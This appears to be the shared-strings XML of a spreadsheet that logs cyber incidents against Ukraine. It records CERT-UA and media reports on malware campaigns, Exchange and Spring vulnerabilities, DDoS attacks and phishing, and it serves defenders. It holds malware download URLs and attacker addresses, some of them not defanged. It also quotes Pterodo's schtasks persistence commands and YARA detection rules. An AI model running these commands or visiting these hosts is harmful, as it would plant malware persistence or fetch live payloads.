    <t>URL forwarding, LOADJUMP, .NET-program, OutSteel, HTTP POST, Hidden macros</t>
  </si>
  <si>
    <t>doc, dll, exe</t>
  </si>
  <si>
    <t>Malicious connection,Unauthorised access to information</t>
  </si>
  <si>
    <t>"02.04", "07.01"</t>
  </si>
  <si>
    <t>45.146.165[.]91
31.31.198[.]151
1833[.]site
gov-ua[.]info
http[:]//president[.]gov[.]ua[.]administration[.]vakansiyi[.]administration[.]president[.]gov-ua[.]info/
http[:]//president[.]gov[.]ua[.]administration[.]vakansiyi[.]administration[.]president[.]gov-ua[.]info/administration/vakansiyi/download/1/756285df0c8b81cf14ad3463a57d33ed.xll
http://1833[.]site/0707a[.]exe
http://45.146.165[.]91:8080/upld/
http[:]//president[.]gov[.]ua[.]administration[.]vakansiyi[.]administration[.]president[.]gov-ua[.]info/storage/j-files-storage/00/90/05/44fcb1b922317cc82b3c3fc5a82efb19_1583907427[.]doc
http[:]//president[.]gov[.]ua[.]administration[.]vakansiyi[.]administration[.]president[.]gov-ua[.]info/storage/j-files-storage/00/90/01/d42580f0a3391eff1571ee7e7c19d05a_1583907427[.]doc
http[:]//president[.]gov[.]ua[.]administration[.]vakansiyi[.]administration[.]president[.]gov-ua[.]info/storage/j-files-storage/00/89/97/f70b4c4e23405b0e0cc5d8e539471cce_1583907427[.]doc
http[:]//president[.]gov[.]ua[.]administration[.]vakansiyi[.]administration[.]president[.]gov-ua[.]info/storage/j-files-storage/00/89/93/756285df0c8b81cf14ad3463a57d33ed_1583907427[.]doc
http[:]//giraffe-tour[.]ru/123/index[.]exe</t>
  </si>
  <si>
    <t>У процесі дослідження інциденту встановлено, що з фейкового веб-сайту здійснюється розповсюдження шкідливого програмного забезпечення OUTSTEEL, призначеного для пошуку та ексфільтрації документів.
Використання подібних тактик, технік та процедур, об'єктів атаки, а також використані зразки шкідливих програм, відслідковується, щонайменше, з квітня 2021 року.
Станом на 15:15 13.07.2021 доступ до веб-сайту заблоковано.</t>
  </si>
  <si>
    <t>https://cert.gov.ua/article/13156</t>
  </si>
  <si>
    <t>0-day, Server-Side Request Forgery (SSRF)</t>
  </si>
  <si>
    <t>Vulnerability,Account compromise</t>
  </si>
  <si>
    <t>"09.01", "05.01"</t>
  </si>
  <si>
    <t>Gained account access</t>
  </si>
  <si>
    <t>Server-Side Request Forgery (SSRF) – вразливість підробки запитів до сервера, яка дозволяє зловмисникам надсилати довільні HTTP-запити та автентифікуватися на локальному сервері Exchange. За допомогою цієї вразливості зловмисники можуть отримати доступ до поштових скриньок користувачів Microsoft Exchange.</t>
  </si>
  <si>
    <t>https://cert.gov.ua/article/11113</t>
  </si>
  <si>
    <t>CVE-2021-26855</t>
  </si>
  <si>
    <t>7,5</t>
  </si>
  <si>
    <t>0-day</t>
  </si>
  <si>
    <t>Вразливість в службі Unified Messaging. Зловмисники, які проексплуатували вразливість CVE-2021-26855 або за допомогою викрадених облікових записів можуть виконати віддалений код (RCE) з правами адміністратора на сервері Microsoft Exchange.</t>
  </si>
  <si>
    <t>CVE-2021-26857</t>
  </si>
  <si>
    <t>6,8</t>
  </si>
  <si>
    <t>Operations with the file system</t>
  </si>
  <si>
    <t>Це вразливість запису файлів після автентифікації в Microsoft Exchange. Використання цієї вразливості може дозволити зловмиснику записати файл у будь-яку директорію сервера Microsoft Exchange після успішного використання CVE-2021-26855 або за допомогою викрадених облікових записів.</t>
  </si>
  <si>
    <t>CVE-2021-26858</t>
  </si>
  <si>
    <t>Це вразливість запису файлів після автентифікації в Exchange. Подібно до CVE-2021-26858, використання цієї вразливості може дозволити зловмиснику записати файл у будь-яку директорію сервера Microsoft Exchange.</t>
  </si>
  <si>
    <t>CVE-2021-27065</t>
  </si>
  <si>
    <t>"АСКОД" users, Email's receiver</t>
  </si>
  <si>
    <t>WINWORD.EXE, Hidden macros, VBScript, Pterodo, HTTP GET, HTTP POST</t>
  </si>
  <si>
    <t>dot, exe, vbs, cmd, txt, cs, bin</t>
  </si>
  <si>
    <t>Malicious connection, Vulnerability, System compromise,Unauthorised access to information</t>
  </si>
  <si>
    <t>"02.04", "09.01", "05.02", "07.01"</t>
  </si>
  <si>
    <t>RCE, Operations with the file system</t>
  </si>
  <si>
    <r>
      <rPr>
        <color rgb="FF1155CC"/>
        <u/>
      </rPr>
      <t xml:space="preserve">http://tridiuma.ru/scaffold.php
</t>
    </r>
    <r>
      <rPr>
        <color rgb="FF000000"/>
        <u/>
      </rPr>
      <t xml:space="preserve">tridiuma.ru
http://barbatus.online/get.php
</t>
    </r>
    <r>
      <rPr>
        <color rgb="FF1155CC"/>
        <u/>
      </rPr>
      <t>http://188.225.37.128/index.php</t>
    </r>
  </si>
  <si>
    <r>
      <rPr/>
      <t>%PUBLIC% \Documents\
%APPDATA%\Microsoft\
schtasks /Create /SC MINUTE /MO 15 /F /tn PublicFolderDownload /tr \Documents\inspection.exe //b \Documents\inspection.vbs, 0, False.
schtasks /Create /SC MINUTE /MO 13 /F /tn HelpOffice /tr "%APPDATA%\Microsoft\say\say.exe //b %APPDATA%\Microsoft\say\say.vbs"
C:\Windows\SysWOW64\PING.EXE pin</t>
    </r>
    <r>
      <rPr>
        <color rgb="FF000000"/>
      </rPr>
      <t xml:space="preserve">g </t>
    </r>
    <r>
      <rPr>
        <color rgb="FF1155CC"/>
        <u/>
      </rPr>
      <t xml:space="preserve">tridiuma.ru
</t>
    </r>
    <r>
      <rPr/>
      <t>SCHTASKS /CREATE /sc minute /mo 5 /tn "" /tr "%USERPROFILE%\UserSupport\UserSupport.exe" /F</t>
    </r>
  </si>
  <si>
    <t>При дослідженні інформації про кіберінциденти спостерігає збільшення кількості кібератак з використанням шкідливого програмного забезпечення (далі - ШПЗ) Pterodo хакерського угрупування Armageddon/Gamaredon, яке пов’язують з урядом РФ.</t>
  </si>
  <si>
    <t>https://cert.gov.ua/article/10702</t>
  </si>
  <si>
    <t>CVE-2017-0199</t>
  </si>
  <si>
    <t>Ukrposhta</t>
  </si>
  <si>
    <t>Ukraine’s national postal service Ukrposhta said it was hit by a DDoS a few days after it issued and started selling stamps associated with the war.</t>
  </si>
  <si>
    <t>https://www.forbes.com/sites/carlieporterfield/2022/04/22/ukraine-postal-service-hit-with-cyberattack-after-selling-viral-anti-russia-stamps/?sh=1b42d0635e60</t>
  </si>
  <si>
    <t>sites of telecommunication companies of Ukraine</t>
  </si>
  <si>
    <t xml:space="preserve">Агресор продовжує атакувати українську інфраструктуру не тільки снарядами та ракетами, а й за допомогою кібератак. У День перемоги над фашизмом ворожі хакери почали масштабну DDoS-атаку на сайти провідних телекомунікаційних компаній України.
Росіяни вже навіть не намагаються приховати свої дії та викладають повідомлення про атаки в інтернет. Ховатися немає сенсу – весь світ знає, хто весь цей час маскувався за анонімними кіберзловмисниками. 
Незважаючи на часткову недоступність сайтів частини атакованих компаній, їхні мережі працюють без перебоїв. У окремих користувачів можливе незначне погіршення якості доступу до інтернет. Але в цілому ані на роботу компаній, ані на надання ними послуг своїм споживачам ця DDoS-атака фактично не вплинула. Що ще раз свідчить про ефективні системи кіберзахисту, які вдалося побудувати українським представникам телеком-бізнесу.
Імовірною метою кібератаки є використання її для проведення чергової інформаційно-психологічної операції проти мешканців України. Російські злочинці вкотре намагаються позбавити українців доступу до інтернету та до правдивої інформації, посіяти панічні настрої. 
Наразі фахівці вживають усіх заходів для зменшення впливу ворожої DDoS-атаки.
</t>
  </si>
  <si>
    <t>https://cip.gov.ua/ua/news/rosiiski-khakeri-zdiisnili-masshtabnu-ddos-ataku-na-saiti-ukrayinskikh-telekom-operatoriv</t>
  </si>
  <si>
    <r>
      <rPr>
        <color rgb="FF1155CC"/>
        <u/>
      </rPr>
      <t>https://loda.gov.ua/</t>
    </r>
    <r>
      <rPr/>
      <t>/</t>
    </r>
  </si>
  <si>
    <t>Мета росії – завоювати всю Україну, а не тільки її Схід. Саме тому вона атакує та атакуватиме надалі не тільки регіональні сервіси та місцеву владу, а й державні установи та компанії, які надають послуги на національному рівні. 
“У кіберпросторі ми бачимо, що російські хакери здійснюють кібератаки як на місцеві ресурси, так і на загальнонаціональні. Іноді ці кібератаки координуються з атаками на землі. Прикладом є атаки на телеком-операторів, які відбувались у певних регіонах. Іноді зв'язку між військовими діями і кібератаками немає”, – підкреслив заступник голови Держспецзв'язку Віктор Жора.  
Так, нещодавно потужної DDoS-атаки зазнав сайт Львівської ОДА, хоча тепер російська армія фокусується на захопленні Сходу. Атака на сайт Львівської ОДА тривала понад 12 годин.</t>
  </si>
  <si>
    <t>https://cip.gov.ua/ua/news/rosiiski-khakeri-atakuyut-informaciini-sistemi-po-vsii-krayini-adzhe-meta-rosiyi-zavoyuvati-vsyu-ukrayinu-a-ne-tilki-yiyi-skhid</t>
  </si>
  <si>
    <t>infected botnet hosts, VPN traffic</t>
  </si>
  <si>
    <t xml:space="preserve">Система захищеного доступу до мережі "Інтернет" Державного центру кіберзахисту (ДЦКЗ) Держспецзв’язку зафіксувала та відбила низку масштабних DDOS-атак, спрямованих на порушення доступності вебресурсів органів державної влади України. 
Фахівці ДЦКЗ визначили, що атаки здійснювали з великої кількості заражених хостів ботнетів, які намагалися замаскуватися під легітимний трафік з браузерів з метою обходу правил блокування. 
Особливістю атаки було здійснення разом із заблокованою DDoS-атакою бот-атаки з імітацією поведінки користувачів. Зловмисники проводили кібероперацію у два етапи. Під час першого проводили генерування ботнет-трафіку у малій кількості, задля перевірки ресурсів на вразливості впродовж кількох днів. Другим етапом було генерування великої кількості трафіку у короткий проміжок часу з метою блокування доступу до вебресурсів. Пікова потужність атак перевищила 435 Gbps.
Атаки здебільшого здійснювали за допомогою VPN-трафіку, маскуючись під різні країни, в тому числі й Україну.
Однак такі маніпуляції були виявлені фахівцями ДЦКЗ та заблоковані завдяки вжитим заходам із додаткових налаштувань політик безпеки.
Доступність ресурсів порушено не було.
</t>
  </si>
  <si>
    <t>https://cip.gov.ua/ua/news/derzhavnii-centr-kiberzakhistu-derzhspeczv-yazku-neitralizuvav-ataku-na-saiti-derzhavnikh-organiv</t>
  </si>
  <si>
    <t>Ukrtelecom</t>
  </si>
  <si>
    <t>Compromised account</t>
  </si>
  <si>
    <t>Availability,Account compromise, Unauthorised modification of information</t>
  </si>
  <si>
    <t>"06.00", "05.01", "07.02"</t>
  </si>
  <si>
    <t>Connectivity collapsing, Gained administrator access</t>
  </si>
  <si>
    <t>A major internet disruption caused by a cyberattack has been registered across Ukraine on national provider Ukrtelecom. Real-time network data show connectivity collapsing to 13% of pre-war levels. The attack was foiled and the company resumed its services.</t>
  </si>
  <si>
    <t>https://cyberpeaceinstitute.org/ukraine-timeline-of-cyberattacks/</t>
  </si>
  <si>
    <t>Availability,Account compromise</t>
  </si>
  <si>
    <t>"06.00", "05.01"</t>
  </si>
  <si>
    <t>Connectivity collapsing, Gained administrator access, System failure</t>
  </si>
  <si>
    <t>Справедливість; ua</t>
  </si>
  <si>
    <t>VietNam, Formbook</t>
  </si>
  <si>
    <t>xls,exe</t>
  </si>
  <si>
    <t>jowhar@xintongwood.club
103.167.92[.]57
217.26.48[.]101
themarketingstinger[.]com
un2030[.]com
project66bug[.]com
spiritpriest[.]com</t>
  </si>
  <si>
    <t>C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\vbc.exe.log</t>
  </si>
  <si>
    <t>"rule win_formbook_auto {
    meta:
        author = ""Felix Bilstein - yara-signator at cocacoding dot com""
        date = ""2022-04-08""
        version = ""1""
        description = ""Detects win.formbook.""
        info = ""autogenerated rule brought to you by yara-signator""
        tool = ""yara-signator v0.6.0""
        signator_config = ""callsandjumps;datarefs;binvalue""
        malpedia_reference = ""https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook""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81ec08020000 56 8b7514 85f6 7507 33c0 5e }
            // n = 7, score = 2200
            //   81ec08020000         | sub                 esp, 0x208
            //   56                   | push                esi
            //   8b7514               | mov                 esi, dword ptr [ebp + 0x14]
            //   85f6                 | test                esi, esi
            //   7507                 | jne                 9
            //   33c0                 | xor                 eax, eax
            //   5e                   | pop                 esi
        $sequence_1 = { eb03 8b4df8 8b550c 8b0491 8b4df4 03c6 50 }
            // n = 7, score = 2200
            //   eb03                 | jmp                 5
            //   8b4df8               | mov                 ecx, dword ptr [ebp - 8]
            //   8b550c               | mov                 edx, dword ptr [ebp + 0xc]
            //   8b0491               | mov                 eax, dword ptr [ecx + edx*4]
            //   8b4df4               | mov                 ecx, dword ptr [ebp - 0xc]
            //   03c6                 | add                 eax, esi
            //   50                   | push                eax
        $sequence_2 = { 83c40c 85f6 7421 8d85f0fdffff 50 e8???????? 8d4c0002 }
            // n = 7, score = 2200
            //   83c40c               | add                 esp, 0xc
            //   85f6                 | test                esi, esi
            //   7421                 | je                  0x23
            //   8d85f0fdffff         | lea                 eax, dword ptr [ebp - 0x210]
            //   50                   | push                eax
            //   e8????????           |                     
            //   8d4c0002             | lea                 ecx, dword ptr [eax + eax + 2]
        $sequence_3 = { 0f84b9000000 33db 395f04 0f86ae000000 83c710 8da42400000000 }
            // n = 6, score = 2200
            //   0f84b9000000         | je                  0xbf
            //   33db                 | xor                 ebx, ebx
            //   395f04               | cmp                 dword ptr [edi + 4], ebx
            //   0f86ae000000         | jbe                 0xb4
            //   83c710               | add                 edi, 0x10
            //   8da42400000000       | lea                 esp, dword ptr [esp]
        $sequence_4 = { 6a00 e8???????? 8b4830 51 8d95fcfeffff 52 e8???????? }
            // n = 7, score = 2200
            //   6a00                 | push                0
            //   e8????????           |                     
            //   8b4830               | mov                 ecx, dword ptr [eax + 0x30]
            //   51                   | push                ecx
            //   8d95fcfeffff         | lea                 edx, dword ptr [ebp - 0x104]
            //   52                   | push                edx
            //   e8????????           |                     
        $sequence_5 = { c3 8b4514 83f832 7508 8b550c 8b420c eb0b }
            // n = 7, score = 2200
            //   c3                   | ret                 
            //   8b4514               | mov                 eax, dword ptr [ebp + 0x14]
            //   83f832               | cmp                 eax, 0x32
            //   7508                 | jne                 0xa
            //   8b550c               | mov                 edx, dword ptr [ebp + 0xc]
            //   8b420c               | mov                 eax, dword ptr [edx + 0xc]
            //   eb0b                 | jmp                 0xd
        $sequence_6 = { 50 e8???????? 83c404 8d8c4500fcffff 51 56 }
            // n = 6, score = 2200
            //   50                   | push                eax
            //   e8????????           |                     
            //   83c404               | add                 esp, 4
            //   8d8c4500fcffff       | lea                 ecx, dword ptr [ebp + eax*2 - 0x400]
            //   51                   | push                ecx
            //   56                   | push                esi
        $sequence_7 = { 8d8db4f9ffff 51 8d95bcfbffff 52 e8???????? 8d85bcfbffff 50 }
            // n = 7, score = 2200
            //   8d8db4f9ffff         | lea                 ecx, dword ptr [ebp - 0x64c]
            //   51                   | push                ecx
            //   8d95bcfbffff         | lea                 edx, dword ptr [ebp - 0x444]
            //   52                   | push                edx
            //   e8????????           |                     
            //   8d85bcfbffff         | lea                 eax, dword ptr [ebp - 0x444]
            //   50                   | push                eax
        $sequence_8 = { e8???????? 03c0 50 8d8df8fdffff 51 }
            // n = 5, score = 2200
            //   e8????????           |                     
            //   03c0                 | add                 eax, eax
            //   50                   | push                eax
            //   8d8df8fdffff         | lea                 ecx, dword ptr [ebp - 0x208]
            //   51                   | push                ecx
        $sequence_9 = { 8b06 8d55fc 52 6a08 50 56 c745f400040000 }
            // n = 7, score = 2200
            //   8b06                 | mov                 eax, dword ptr [esi]
            //   8d55fc               | lea                 edx, dword ptr [ebp - 4]
            //   52                   | push                edx
            //   6a08                 | push                8
            //   50                   | push                eax
            //   56                   | push                esi
            //   c745f400040000       | mov                 dword ptr [ebp - 0xc], 0x400
    condition:
        7 of them and filesize &lt; 371712
}"</t>
  </si>
  <si>
    <t>Зараз спостерігаються масові розсилки шкідливого програмного забезпечення на електронні пошти працівників державних органів та громадян України.
Було виявлено розсилку е-листів зі скриньки jowhar@xintongwood.club з темою листа “Лист”, в якому міститься вкладення “лист справедливості.xlsx”, який прі відкритті завантажує ШПЗ FormBook.
Зазначений файл перший раз було помічено ще 28.02.2022.
лист справедливості.xls (CVE-2017-11882) -&gt; http://103.167.92[.]57/space360/vbc.exe (VietNam) -&gt; vbс.exe (ff86ee00297625c36492661a61af33b19ded1612)
Файл за посиланням http://103.167.92[.]57/space360/vbc.exe вже видалено.</t>
  </si>
  <si>
    <t>https://www.facebook.com/story.php?story_fbid=317263187099613&amp;id=100064478028712</t>
  </si>
  <si>
    <t>Spring Framework users</t>
  </si>
  <si>
    <t>Spring4Shell</t>
  </si>
  <si>
    <r>
      <rPr/>
      <t xml:space="preserve">UPD!
Звертаємо Вашу увагу на нові вразливісті Spring Framework: Spring4Shell (CVE-2022-22965), CVE-2022-22950 та CVE-2022-22963.
CVE-2022-22965 (Spring4Shell)
Spring4Shell на даний момент не має CVE ID. Дана вразливість існує в Spring core з JDK від версії 9.0 включною.
Більше деталей про вразливість та рекомендації за посиланням:
https://tanzu.vmware.com/security/cve-2022-22965
CVE-2022-22950
У версіях Spring Framework 5.3.0 - 5.3.16 і старіших непідтримуваних версіях користувач може надати спеціально створений вираз SpEL, який може спричинити відмову в обслуговуванні.
Більше деталей про вразливість та рекомендації за посиланням:
https://tanzu.vmware.com/security/cve-2022-22950
CVE-2022-22963
Вразливість знайдено у версіях Spring Cloud Function 3.0.0.RELEASE - 3.2.2.
Дана вразливість дозволяє зловмиснику за допомогою введення виразу SPEL віддалене виконання довільного коду.
Більше деталей про вразливість та рекомендації за посиланням:
</t>
    </r>
    <r>
      <rPr>
        <color rgb="FF1155CC"/>
        <u/>
      </rPr>
      <t>https://tanzu.vmware.com/security/cve-2022-22963</t>
    </r>
  </si>
  <si>
    <t>https://www.facebook.com/UACERT</t>
  </si>
  <si>
    <t>CVE-2022-22965</t>
  </si>
  <si>
    <t>CWE-94</t>
  </si>
  <si>
    <t xml:space="preserve">SPEL </t>
  </si>
  <si>
    <r>
      <rPr/>
      <t xml:space="preserve">UPD!
Звертаємо Вашу увагу на нові вразливісті Spring Framework: Spring4Shell (CVE-2022-22965), CVE-2022-22950 та CVE-2022-22963.
CVE-2022-22965 (Spring4Shell)
Spring4Shell на даний момент не має CVE ID. Дана вразливість існує в Spring core з JDK від версії 9.0 включною.
Більше деталей про вразливість та рекомендації за посиланням:
https://tanzu.vmware.com/security/cve-2022-22965
CVE-2022-22950
У версіях Spring Framework 5.3.0 - 5.3.16 і старіших непідтримуваних версіях користувач може надати спеціально створений вираз SpEL, який може спричинити відмову в обслуговуванні.
Більше деталей про вразливість та рекомендації за посиланням:
https://tanzu.vmware.com/security/cve-2022-22950
CVE-2022-22963
Вразливість знайдено у версіях Spring Cloud Function 3.0.0.RELEASE - 3.2.2.
Дана вразливість дозволяє зловмиснику за допомогою введення виразу SPEL віддалене виконання довільного коду.
Більше деталей про вразливість та рекомендації за посиланням:
</t>
    </r>
    <r>
      <rPr>
        <color rgb="FF1155CC"/>
        <u/>
      </rPr>
      <t>https://tanzu.vmware.com/security/cve-2022-22963</t>
    </r>
  </si>
  <si>
    <t>CVE-2022-22950</t>
  </si>
  <si>
    <t>CWE-770</t>
  </si>
  <si>
    <t>4,0</t>
  </si>
  <si>
    <r>
      <rPr/>
      <t xml:space="preserve">UPD!
Звертаємо Вашу увагу на нові вразливісті Spring Framework: Spring4Shell (CVE-2022-22965), CVE-2022-22950 та CVE-2022-22963.
CVE-2022-22965 (Spring4Shell)
Spring4Shell на даний момент не має CVE ID. Дана вразливість існує в Spring core з JDK від версії 9.0 включною.
Більше деталей про вразливість та рекомендації за посиланням:
https://tanzu.vmware.com/security/cve-2022-22965
CVE-2022-22950
У версіях Spring Framework 5.3.0 - 5.3.16 і старіших непідтримуваних версіях користувач може надати спеціально створений вираз SpEL, який може спричинити відмову в обслуговуванні.
Більше деталей про вразливість та рекомендації за посиланням:
https://tanzu.vmware.com/security/cve-2022-22950
CVE-2022-22963
Вразливість знайдено у версіях Spring Cloud Function 3.0.0.RELEASE - 3.2.2.
Дана вразливість дозволяє зловмиснику за допомогою введення виразу SPEL віддалене виконання довільного коду.
Більше деталей про вразливість та рекомендації за посиланням:
</t>
    </r>
    <r>
      <rPr>
        <color rgb="FF1155CC"/>
        <u/>
      </rPr>
      <t>https://tanzu.vmware.com/security/cve-2022-22963</t>
    </r>
  </si>
  <si>
    <t>CVE-2022-22963</t>
  </si>
  <si>
    <t>web page visitors, Facebook users</t>
  </si>
  <si>
    <t>Розіграш, Автомобіль, Тесла; ua</t>
  </si>
  <si>
    <t>Armor VPN</t>
  </si>
  <si>
    <t>https://www.facebook.com/EIon-musk-106785861955521/
hХХps://sites.google[.]com/view/elontesla21/halaman-muka?fbclid=IwAR0_lKgf5a0LKhNwOFjjdQ_g0f7QT67JorzFdfKmRdvHWEthwKSqmkhN3rE</t>
  </si>
  <si>
    <t>Виявлено фішинговий сайт, на якому начебто розігруються автомобілі Тесла.
Для реклами сайту було створено фейкову сторінку в соціальній мережі Facebook
https://www.facebook.com/EIon-musk-106785861955521/
Сторінка створена 04.03.2022 і має вже майже 25 тис. підписників, а інформація з неї поширювалась навіть в легітимних телеграм-каналах ЗМІ.
Також, вона активно рекламується у FB із зазначеного фейкового акаунту.
Реклама веде на сайт 
hХХps://sites.google[.]com/view/elontesla21/halaman-muka?fbclid=IwAR0_lKgf5a0LKhNwOFjjdQ_g0f7QT67JorzFdfKmRdvHWEthwKSqmkhN3rE
На сайті користувача повідомляють, що він, начебто, переможець та йому потрібно заповнити анкету за посиланням та завантажити додаток.
При переході за посиланням після декількох редиректів вам пропонується заповнити анкету з персональними даними та завантажити  VPN клієнт “Armor VPN”, що призведе до відслідковування діяльності користувача в мережі Інтернет або витоку персональних даних з  мобільного телефону жертви.
Цей фішинг направлений на зараження мобільних пристоїв громадян України та викрадення персональних даних.</t>
  </si>
  <si>
    <t>Bind users</t>
  </si>
  <si>
    <t>poisoned cache</t>
  </si>
  <si>
    <t>Vulnerability, Outage_no_malice</t>
  </si>
  <si>
    <t>"09.01", "06.03"</t>
  </si>
  <si>
    <t>System failure</t>
  </si>
  <si>
    <r>
      <rPr/>
      <t xml:space="preserve">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t>
    </r>
    <r>
      <rPr>
        <color rgb="FF1155CC"/>
        <u/>
      </rPr>
      <t>https://www.mozilla.org/.../security/advisories/mfsa2022-09/</t>
    </r>
  </si>
  <si>
    <t>CVE-2021-25220</t>
  </si>
  <si>
    <t>5,0</t>
  </si>
  <si>
    <t xml:space="preserve">Specifically crafted TCP streams </t>
  </si>
  <si>
    <r>
      <rPr/>
      <t xml:space="preserve">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t>
    </r>
    <r>
      <rPr>
        <color rgb="FF1155CC"/>
        <u/>
      </rPr>
      <t>https://www.mozilla.org/.../security/advisories/mfsa2022-09/</t>
    </r>
  </si>
  <si>
    <t>CVE-2022-0396</t>
  </si>
  <si>
    <t>CWE-404</t>
  </si>
  <si>
    <t>series of specific queries</t>
  </si>
  <si>
    <r>
      <rPr/>
      <t xml:space="preserve">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t>
    </r>
    <r>
      <rPr>
        <color rgb="FF1155CC"/>
        <u/>
      </rPr>
      <t>https://www.mozilla.org/.../security/advisories/mfsa2022-09/</t>
    </r>
  </si>
  <si>
    <t>CVE-2022-0635</t>
  </si>
  <si>
    <t>CWE-617</t>
  </si>
  <si>
    <r>
      <rPr/>
      <t xml:space="preserve">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t>
    </r>
    <r>
      <rPr>
        <color rgb="FF1155CC"/>
        <u/>
      </rPr>
      <t>https://www.mozilla.org/.../security/advisories/mfsa2022-09/</t>
    </r>
  </si>
  <si>
    <t>CVE-2022-0667</t>
  </si>
  <si>
    <t>CADDYWIPER, Active Directory, Compromised account</t>
  </si>
  <si>
    <t xml:space="preserve">System compromise, Malicious code </t>
  </si>
  <si>
    <t>"05.02", "02.00"</t>
  </si>
  <si>
    <t>rule win_caddywiper_w0 {
	meta:
		author = "IBM Security X-Force"
		description = "Detects CaddyWiper"
		threat_type = "Malware"
		rule_category = "Malware Family"
		usage = "Hunting and Identification"
		hash = "a294620543334a721a2ae8eaaf9680a0786f4b9a216d75b55cfd28f39e9430ea"
		yara_version = "4.0.2"
		date_created = "15 March 22"
        malpedia_rule_date = "20220315"
        malpedia_hash = ""
		malpedia_reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.caddywiper"
		malpedia_version = "20220316"
		malpedia_license = "CC BY-NC-SA 4.0"
		malpedia_sharing = "TLP:WHITE"
	strings:
		$s1 = "DsRoleGetPrimaryDomainInformation" ascii fullword
		$hex1 = {
			C645??43 //'C'
			C645??3A //':'
			C645??5C //'\'
			C645??55 //'U'
			C645??73 //'s'
			C645??65 //'e'
			C645??72 //'r'
			C645??73 //'s'
		}
		$hex2 = {
			C645??44 // 'D'
			C645??65 // 'e'
			C645??76 // 'v'
			C645??69 // 'i'
			C645??63 // 'c'
			C645??65 // 'e'
			C645??49 // 'I'
			C645??6F // 'o'
			C645??43 // 'C'
			C645??6F // 'o'
			C645??6E // 'n'
			C645??74 // 't'
			C645??72 // 'r'
			C645??6F // 'o'
			C645??6C // 'l'
		}
	condition:
		uint16(0) == 0x5A4D and 
		all of them
}</t>
  </si>
  <si>
    <t>Компанією ESET опубліковано інформацію про виявлення в Україні нового деструктивного ШПЗ  CaddyWiper.  ШПЗ видаляє дані з операційних систем Windows та інформацію про розділи жорстких дисків.
https://twitter.com/ESETresearch/status/1503436420886712321
CaddyWiper завантажується та запускається зловмисниками  на вже скомпрометованих системах за допомогою групових політик Active Directory.
ІОС:
Files:
caddy1.exe
MD5  42e52b8daf63e6e26c3aa91e7e971492
SHA1 98b3fb74b3e8b3f9b05a82473551c5a77b576d54
SHA-256 a294620543334a721a2ae8eaaf9680a0786f4b9a216d75b55cfd28f39e9430ea</t>
  </si>
  <si>
    <t>Not yet known;Russia APT</t>
  </si>
  <si>
    <t>Несанкціонований вхід, IP, Донецьк; ua</t>
  </si>
  <si>
    <t>Phishing,Account compromise</t>
  </si>
  <si>
    <t>"03.03", "05.01"</t>
  </si>
  <si>
    <t>muthuprakash.b@tvsrubber.com
rakesh.ict@msruas.ac.in
omars@salecharter.net
citi.in.pm@xerago.com
qs@gsengint.com
citi.in.pm@xerago.com
sec.ls@msruas.ac.in
vaishnavi.kj@tvsrubber.com
qs@gsengint.com
nshcorp@nshcorp.in
purchase2@hitechelastomers.com
productionbelgavi@hodekindia.com
narayanababu.py.ph@msruas.ac.in
roopa.tsld@msruas.ac.in
in-nonciti.basupport@xerago.com
info@empiink.com
in-nonciti.basupport@xerago.com
pooja.fa@msruas.ac.in
babu.d@tvsrubber.com
systeam@xerago.com
dean.ds@msruas.ac.in
hxxp://consumerspanel.frge[.]io/</t>
  </si>
  <si>
    <t>Оновлення: 
фішингова сторінка з листів hxxp://consumerspanel.frge[.]io/ вже заблокована, але в нових листах можуть з'явитись нові активні посилання.
Отримуємо багато повідомлень про розсилку фішингових е-листів з метою компрометації електронної пошти громадян України. 
Листи начебто пересилаються від ukr.net але насправді шлються з поштової скриньки muthuprakash.b@tvsrubber.com з темою "Увага" і містять інформацію про те, що до пошти начебто "ЗАФІКСІКСІРОВАЛІ" спроби входу з ІР-адреси в Донецьку і потрібно негайно змінити пароль за посиланням. Після переходу за посиланям та введення паролю він потрапляє до зловмисників. Таким чином вони отримують доступ до електронних скриньок громадян України.
Якщо ви отримували такі листи просимо негайно переслати їх на пошту cert@cert.gov.ua для подальшого аналізу.
Якщо ви вводили пароль за посиланням НЕГАЙНО змініть його.</t>
  </si>
  <si>
    <t>Заблокування, Пошта, Підтвердження особи; ru</t>
  </si>
  <si>
    <t>IMAP</t>
  </si>
  <si>
    <t>Gained account access, Spread the infection further</t>
  </si>
  <si>
    <t>i[.]ua-passport[.]space
id[.]bigmir[.]space</t>
  </si>
  <si>
    <t>Виявлено масові фішингові листи на email-адреси українських сервісів i.ua та meta.ua. Цілями атаки стають приватні поштові скриньки українських військових, а також пов’язаних з ними осіб. Після компрометації облікового запису, за протоколом IMAP здійснюється завантаження всієї наявної пошти. Також ворог використовує наявні контактні адреси для подальших розсилок.
Вказанії дії вчиняються так званою групою UNC1151, котра розташована в Мінську. До її складу входять кадрові офіцери Міністерства оборони Республіки Білорусь.
i[.]ua-passport[.]space
id[.]bigmir[.]space
Приклад фішінгового листа:
“Уважаемый пользователь. Ваши данные не подтверждены,в связи с этим Ваш почтовый ящик в течении 2 суток будет заблокирован. Для разблокировки почтового ящика мы должны удостовериться, что Вы не являетесь спам-ботом. Для этого передейдите по ссылке ниже и подтвердите свои учётные данные: В противном случае ваш почтовый ящик будет удалён безвозвратно. Надеемся на Ваше понимание. 
С уважением, команда I.UA”</t>
  </si>
  <si>
    <t>Робота; en</t>
  </si>
  <si>
    <t>zip</t>
  </si>
  <si>
    <t>Увага! 
Проти українців почалася фішингова атака! На електронні адреси громадян надходять листи з прикріпленими файлами невизначеного характеру. Не виключено розсилки подібних повідомлень в месенджери. Ворожі сили мають на меті отримати доступ до електронних пристроїв українців для збору великого масиву інформації! 
В ЖОДНОМУ РАЗІ НЕ ВІДКРИВАЙТЕ ВМІСТ ТАКИХ ЛИСТІВ ТА ПОВІДОМЛЕНЬ!!! 
Пам'ятайте про кібергігієну!</t>
  </si>
  <si>
    <t>TeamLucernaRD;Unknown</t>
  </si>
  <si>
    <t>HTML-page, JavaScript, URL forwarding</t>
  </si>
  <si>
    <t xml:space="preserve">hxxps://rwi2v[.]eu/Q2llT5wJ
hxxps://www.youtube[.]com/
theone2716@gmail[.]com
hxxps://87yc[.]xyz/?api=1&amp;lan=fbnewold&amp;ht=1&amp;c=geraldking13&amp;user=geraldking1321
https://87yc[.]xyz/save.php?api=1&amp;lan=fbnewold&amp;ht=1&amp;c=geraldking13&amp;user=geraldking1321
rwi2v[.]eu  
v0k[.]us   
t7s[.]us   
r0m[.]us    
j0r[.]us   
f1r[.]us    
